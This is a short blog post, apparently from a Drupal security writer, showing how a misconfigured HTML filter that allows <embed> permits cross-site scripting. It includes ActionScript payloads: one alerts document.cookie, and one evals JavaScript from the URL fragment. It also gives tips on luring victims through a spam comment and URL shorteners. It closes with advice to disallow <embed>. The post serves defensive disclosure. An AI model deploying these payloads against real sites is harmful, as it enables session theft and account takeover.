Input Format
Using <embed> for XSS
Heine — Fri, 30/10/2009 - 18:38
I see a lot less stray <script> tags in the "Allowed HTML tags:" of the HTML filter these days. The <embed> tag is something I still see a lot in misconfigured formats.
It's rather easy to exploit such formats to execute JavaScript with a little bit of ActionScript:
{
static function main(){
getURL('javascript:alert(document.cookie)');
}
}
Build with an ActionScript 2 compiler (eg Flex SDK), upload to a convenient location *), then make a post on the site that was so careless to allow the <embed> tag:
Excellent article, it's pleasure to read your blog ?
<a href="http://example.com/fxxgg">FOREX</a>
Now all you have to do is lead the victim to this URL:
If you can't be bothered to change your swf file all the time, you can attempt to create a generic XSS attack that fetches JS from the URL fragment:
{
static function main(){
getURL('javascript:eval(document.location.hash.substr(1))');
}
}
The victim now has to visit (use a URL shortener for maximum obfuscation):
That's it folks. Moral of the story: don't allow <embed> use in the HTML filter. If you need to embed videos, employ one of the modules that insert videos from trusted sources and prevent script interaction.
*) Bonus points if you upload the swf to another misconfigured Drupal site! Hint:
Input formats - the quickest way to make your site insecure
Heine — Sun, 30/12/2007 - 23:15
In a desperate attempt to balance my karma at the end of the year, a small public service post about the most popular way to make your site insecure. This is aimed at website administrators and developers. There will be no code (promise).
